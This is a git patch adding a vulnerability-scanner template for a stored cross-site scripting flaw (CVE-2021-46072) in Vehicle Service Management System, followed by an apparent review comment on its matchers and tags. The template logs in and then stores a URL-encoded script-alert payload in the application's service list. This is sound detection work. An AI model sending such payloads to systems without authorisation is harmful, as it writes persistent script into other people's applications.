From 833f05f9dfe9fcb77808194ae5e91f652d2f5047 Mon Sep 17 00:00:00 2001
From: TenBird-1 <109490477+TenBird-1@users.noreply.github.com>
Date: Thu, 1 Sep 2022 00:35:41 +0900
Subject: [PATCH] CREATE CVE-2021-46072
---
cves/2021/CVE-2021-46072.yaml | 51 +++++++++++++++++++++++++++++++++++
1 file changed, 51 insertions(+)
create mode 100644 cves/2021/CVE-2021-46072.yaml
diff --git a/cves/2021/CVE-2021-46072.yaml b/cves/2021/CVE-2021-46072.yaml
new file mode 100644
index 0000000000..40869cae15
--- /dev/null
+++ b/cves/2021/CVE-2021-46072.yaml
@@ -0,0 +1,51 @@
+id: CVE-2021-46072
+info:
+ name: Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)
+ author: TenBird
+ severity: Medium
+ description: A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-46072
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2021-46072
+ cwe-id: CWE-79
+ tags: cve,cve2021,Stored XSS,Cross-Site-Script
+
+requests:
+ - raw:
+
+ - |
+ GET /vehicle_service/admin/login.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ username={{username}}&password={{password}}
+
+ - |
+ POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
+
+ - |
+ GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1
+ Host: {{Hostname}}
+
+ redirects: true
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - '">'
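Review bot: The body matcher `- '">'` at the end of the template is satisfied by almost any HTML page, so together with status 200 it will report hosts that never stored the payload; match the stored payload itself, e.g. `- '"><script>alert(document.domain)</script>'`, and add a `part: header` word matcher for `text/html`. The matchers appear to be evaluated against each of the four responses, so the unauthenticated login page fetched by the first request may already satisfy both conditions before any login succeeds. The third request writes a persistent script entry into the application's service list, so the tags should include `intrusive` and `authenticated` to let operators exclude it from routine scans, and `Stored XSS,Cross-Site-Script` should become lowercase, space-free tags such as `xss`. `severity: Medium` would conventionally be written lowercase as `medium`.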